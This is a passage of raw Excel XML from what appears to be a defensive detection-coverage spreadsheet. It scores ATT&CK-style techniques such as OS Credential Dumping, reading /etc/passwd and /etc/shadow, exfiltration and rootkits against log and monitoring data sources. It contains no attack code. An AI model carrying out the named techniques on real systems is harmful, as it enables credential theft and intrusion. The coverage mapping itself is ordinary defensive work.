              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C97:E97</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{1046C76A-5CCE-4BA0-BA72-1E32A5404BE4}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F97</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{9E703173-FD1C-49D1-B1D3-E84ADB379664}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C98:E98</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{11B547AC-954F-4B03-B1C5-4868980407EF}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F98</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{D1CF6177-62EF-4388-9E1E-F665E2625163}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C99:E99</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{43C68606-AF7C-4819-8129-31FA2073F874}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F99</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{5EECF62D-61BE-4B44-9F5D-351D2652E97E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C100:E100</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{71C4A432-AF4B-476D-BD50-ADF6A1555951}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F100</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{1ABB6B78-DF6F-4CFE-867F-FBE36CDAA92A}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C101:E101</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{9DDEDC39-4DC5-4B93-838C-97AA16A4FE71}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F101</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{CDA1D47B-B38D-4A16-9829-B6D0422F3EC5}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C102:E102</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{7AE861F1-CC0A-4C4C-A23B-12DDE14AC3C4}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F102</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{C0564927-435D-4431-84E3-EE29454E3E39}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C103:E115</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{C0337D63-46A3-4DD3-8CD2-36FDFD19FCC0}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F103:F115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8A1C3-EA6F-4B4B-BBD4-B62E82A3A657}">
  <dimension ref="A1:AC431"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="I268" sqref="F268:I268"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" customWidth="1"/>
    <col min="2" max="4" width="57.1640625" customWidth="1"/>
    <col min="5" max="5" width="20.6640625" customWidth="1"/>
    <col min="6" max="8" width="20.6640625" style="2" customWidth="1"/>
    <col min="9" max="9" width="32.5" style="1" customWidth="1"/>
    <col min="10" max="10" width="9.1640625" style="3" customWidth="1"/>
    <col min="11" max="11" width="77.83203125" style="3" customWidth="1"/>
    <col min="12" max="29" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="42" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="42" t="s">
        <v>406</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>2885</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>2886</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>407</v>
      </c>
      <c r="F1" s="44" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="44" t="s">
        <v>2887</v>
      </c>
      <c r="H1" s="44" t="s">
        <v>4</v>
      </c>
      <c r="I1" s="31" t="s">
        <v>5</v>
      </c>
      <c r="J1" s="42"/>
      <c r="K1" s="42" t="s">
        <v>2888</v>
      </c>
    </row>
    <row r="2" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A2" s="43" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="41" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:B)</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="C2" s="45" t="s">
        <v>2889</v>
      </c>
      <c r="D2" s="45" t="s">
        <v>2890</v>
      </c>
      <c r="E2" s="45"/>
      <c r="F2" s="14">
        <v>4</v>
      </c>
      <c r="G2" s="14">
        <v>3</v>
      </c>
      <c r="H2" s="14">
        <v>4</v>
      </c>
      <c r="I2" s="32">
        <f t="shared" ref="I2:I6" si="0">((F2*2)+G2+(H2*2))/5</f>
        <v>3.8</v>
      </c>
      <c r="K2" s="46" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
    </row>
    <row r="3" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A3" s="43" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="41" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:B)</f>
        <v>Protocol Impersonation</v>
      </c>
      <c r="C3" s="45" t="s">
        <v>2891</v>
      </c>
      <c r="D3" s="45" t="s">
        <v>2892</v>
      </c>
      <c r="E3" s="45"/>
      <c r="F3" s="14">
        <v>2</v>
      </c>
      <c r="G3" s="14">
        <v>4</v>
      </c>
      <c r="H3" s="14">
        <v>2</v>
      </c>
      <c r="I3" s="32">
        <f t="shared" si="0"/>
        <v>2.4</v>
      </c>
      <c r="K3" s="46" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
    </row>
    <row r="4" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A4" s="43" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="41" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:B)</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="C4" s="45" t="s">
        <v>2893</v>
      </c>
      <c r="D4" s="45" t="s">
        <v>574</v>
      </c>
      <c r="E4" s="45"/>
      <c r="F4" s="14">
        <v>4</v>
      </c>
      <c r="G4" s="14">
        <v>3</v>
      </c>
      <c r="H4" s="14">
        <v>4</v>
      </c>
      <c r="I4" s="32">
        <f t="shared" si="0"/>
        <v>3.8</v>
      </c>
      <c r="K4" s="46" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
    </row>
    <row r="5" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A5" s="43" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="41" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:B)</f>
        <v>/etc/passwd and /etc/shadow</v>
      </c>
      <c r="C5" s="45"/>
      <c r="D5" s="45"/>
      <c r="E5" s="45"/>
      <c r="F5" s="14">
        <v>0</v>
      </c>
      <c r="G5" s="14">
        <v>0</v>
      </c>
      <c r="H5" s="14">
        <v>0</v>
      </c>
      <c r="I5" s="32">
        <f>((F5*2)+G5+(H5*2))/5</f>
        <v>0</v>
      </c>
      <c r="K5" s="46" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
    </row>
    <row r="6" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A6" s="43" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="41" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:B)</f>
        <v>Data from Local System</v>
      </c>
      <c r="C6" s="45"/>
      <c r="D6" s="45"/>
      <c r="E6" s="45"/>
      <c r="F6" s="14">
        <v>0</v>
      </c>
      <c r="G6" s="14">
        <v>0</v>
      </c>
      <c r="H6" s="14">
        <v>0</v>
      </c>
      <c r="I6" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K6" s="46" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="7" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A7" s="43" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="41" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:B)</f>
        <v>Direct Volume Access</v>
      </c>
      <c r="C7" s="45"/>
      <c r="D7" s="45"/>
      <c r="E7" s="45"/>
      <c r="F7" s="14">
        <v>0</v>
      </c>
      <c r="G7" s="14">
        <v>0</v>
      </c>
      <c r="H7" s="14">
        <v>0</v>
      </c>
      <c r="I7" s="32">
        <f>((F7*2)+G7+(H7*2))/5</f>
        <v>0</v>
      </c>
      <c r="K7" s="46" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
    </row>
    <row r="8" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A8" s="43" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="41" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:B)</f>
        <v>System Service Discovery</v>
      </c>
      <c r="C8" s="45"/>
      <c r="D8" s="45"/>
      <c r="E8" s="45"/>
      <c r="F8" s="14">
        <v>0</v>
      </c>
      <c r="G8" s="14">
        <v>0</v>
      </c>
      <c r="H8" s="14">
        <v>0</v>
      </c>
      <c r="I8" s="32">
        <f t="shared" ref="I8:I51" si="1">((F8*2)+G8+(H8*2))/5</f>
        <v>0</v>
      </c>
      <c r="K8" s="46" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="9" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A9" s="43" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="41" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C9" s="45"/>
      <c r="D9" s="45"/>
      <c r="E9" s="45"/>
      <c r="F9" s="14">
        <v>0</v>
      </c>
      <c r="G9" s="14">
        <v>0</v>
      </c>
      <c r="H9" s="14">
        <v>0</v>
      </c>
      <c r="I9" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K9" s="46" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="10" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A10" s="43" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="41" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
      </c>
      <c r="C10" s="45"/>
      <c r="D10" s="45"/>
      <c r="E10" s="45"/>
      <c r="F10" s="14">
        <v>0</v>
      </c>
      <c r="G10" s="14">
        <v>0</v>
      </c>
      <c r="H10" s="14">
        <v>0</v>
      </c>
      <c r="I10" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K10" s="46" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="11" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A11" s="43" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="41" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:B)</f>
        <v>Application Window Discovery</v>
      </c>
      <c r="C11" s="45"/>
      <c r="D11" s="45"/>
      <c r="E11" s="45"/>
      <c r="F11" s="14">
        <v>0</v>
      </c>
      <c r="G11" s="14">
        <v>0</v>
      </c>
      <c r="H11" s="14">
        <v>0</v>
      </c>
      <c r="I11" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K11" s="46" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="12" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A12" s="43" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="41" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Other Network Medium</v>
      </c>
      <c r="C12" s="45"/>
      <c r="D12" s="45"/>
      <c r="E12" s="45"/>
      <c r="F12" s="14">
        <v>0</v>
      </c>
      <c r="G12" s="14">
        <v>0</v>
      </c>
      <c r="H12" s="14">
        <v>0</v>
      </c>
      <c r="I12" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K12" s="46" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
    </row>
    <row r="13" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A13" s="43" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="41" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C13" s="45"/>
      <c r="D13" s="45"/>
      <c r="E13" s="45"/>
      <c r="F13" s="14">
        <v>0</v>
      </c>
      <c r="G13" s="14">
        <v>0</v>
      </c>
      <c r="H13" s="14">
        <v>0</v>
      </c>
      <c r="I13" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K13" s="46" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="14" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A14" s="43" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="41" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:B)</f>
        <v>Query Registry</v>
      </c>
      <c r="C14" s="45"/>
      <c r="D14" s="45"/>
      <c r="E14" s="45"/>
      <c r="F14" s="14">
        <v>0</v>
      </c>
      <c r="G14" s="14">
        <v>0</v>
      </c>
      <c r="H14" s="14">
        <v>0</v>
      </c>
      <c r="I14" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K14" s="46" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="15" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A15" s="43" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="41" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C15" s="45"/>
      <c r="D15" s="45"/>
      <c r="E15" s="45"/>
      <c r="F15" s="14">
        <v>0</v>
      </c>
      <c r="G15" s="14">
        <v>0</v>
      </c>
      <c r="H15" s="14">
        <v>0</v>
      </c>
      <c r="I15" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K15" s="46" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
    </row>
    <row r="16" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A16" s="43" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="41" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:B)</f>
        <v>Rootkit</v>
      </c>
      <c r="C16" s="45"/>
      <c r="D16" s="45"/>
      <c r="E16" s="45"/>
      <c r="F16" s="14">
        <v>0</v>
      </c>
      <c r="G16" s="14">
        <v>0</v>
      </c>
      <c r="H16" s="14">
        <v>0</v>
      </c>
      <c r="I16" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K16" s="46" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
    </row>
    <row r="17" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A17" s="43" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="41" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C17" s="45"/>
      <c r="D17" s="45"/>
      <c r="E17" s="45"/>
      <c r="F17" s="14">
        <v>0</v>
      </c>
      <c r="G17" s="14">
        <v>0</v>
      </c>
      <c r="H17" s="14">
        <v>0</v>
      </c>
      <c r="I17" s="32">
        <f>((F17*2)+G17+(H17*2))/5</f>
        <v>0</v>
      </c>
      <c r="K17" s="46" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="18" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A18" s="43" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="41" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C18" s="45"/>
      <c r="D18" s="45"/>
      <c r="E18" s="45"/>
      <c r="F18" s="14">
        <v>0</v>
      </c>
      <c r="G18" s="14">
        <v>0</v>
      </c>
      <c r="H18" s="14">
        <v>0</v>
      </c>
      <c r="I18" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K18" s="46" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="19" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A19" s="43" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="41" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C19" s="45"/>
      <c r="D19" s="45"/>
      <c r="E19" s="45"/>
      <c r="F19" s="14">
        <v>0</v>
      </c>
      <c r="G19" s="14">
        <v>0</v>
      </c>
      <c r="H19" s="14">
        <v>0</v>
      </c>
      <c r="I19" s="32">
        <f>((F19*2)+G19+(H19*2))/5</f>
        <v>0</v>
      </c>
      <c r="K19" s="46" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
    </row>
    <row r="20" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A20" s="43" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="41" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C20" s="45"/>
      <c r="D20" s="45"/>
      <c r="E20" s="45"/>
      <c r="F20" s="14">
        <v>0</v>
      </c>
      <c r="G20" s="14">
        <v>0</v>
      </c>
      <c r="H20" s="14">
        <v>0</v>
      </c>
      <c r="I20" s="32">
        <f>((F20*2)+G20+(H20*2))/5</f>
        <v>0</v>
      </c>
      <c r="K20" s="46" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
    </row>
    <row r="21" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A21" s="43" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="41" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:B)</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="C21" s="45"/>
      <c r="D21" s="45"/>
      <c r="E21" s="45"/>
      <c r="F21" s="14">
        <v>0</v>
      </c>
      <c r="G21" s="14">
        <v>0</v>
      </c>
      <c r="H21" s="14">
        <v>0</v>
      </c>
      <c r="I21" s="32">
        <f>((F21*2)+G21+(H21*2))/5</f>
        <v>0</v>
      </c>
      <c r="K21" s="46" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="22" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A22" s="43" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="41" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:B)</f>
        <v>Remote Services</v>
      </c>
      <c r="C22" s="45"/>
      <c r="D22" s="45"/>
      <c r="E22" s="45"/>
      <c r="F22" s="14">
        <v>0</v>
      </c>
      <c r="G22" s="14">
        <v>0</v>
      </c>
      <c r="H22" s="14">
        <v>0</v>
      </c>
      <c r="I22" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K22" s="46" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</v>
      </c>
    </row>
    <row r="23" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A23" s="43" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="41" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C23" s="45"/>
      <c r="D23" s="45"/>
      <c r="E23" s="45"/>
      <c r="F23" s="14">
        <v>0</v>
      </c>
      <c r="G23" s="14">
        <v>0</v>
      </c>
      <c r="H23" s="14">
        <v>0</v>
      </c>
      <c r="I23" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K23" s="46" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
    </row>
    <row r="24" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A24" s="43" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="41" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C24" s="45"/>
      <c r="D24" s="45"/>
      <c r="E24" s="45"/>
      <c r="F24" s="14">
        <v>0</v>
      </c>
      <c r="G24" s="14">
        <v>0</v>
      </c>
      <c r="H24" s="14">
        <v>0</v>
      </c>
      <c r="I24" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K24" s="46" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
    </row>
    <row r="25" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A25" s="43" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="41" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C25" s="45"/>
      <c r="D25" s="45"/>
      <c r="E25" s="45"/>
      <c r="F25" s="14">
        <v>0</v>
      </c>
      <c r="G25" s="14">
        <v>0</v>
      </c>
      <c r="H25" s="14">
        <v>0</v>
      </c>
      <c r="I25" s="32">
        <f>((F25*2)+G25+(H25*2))/5</f>
        <v>0</v>
      </c>
      <c r="K25" s="46" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
    </row>
    <row r="26" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A26" s="43" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="41" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:B)</f>
        <v>Data from Removable Media</v>
      </c>
      <c r="C26" s="45"/>
      <c r="D26" s="45"/>
      <c r="E26" s="45"/>
      <c r="F26" s="14">
        <v>0</v>
      </c>
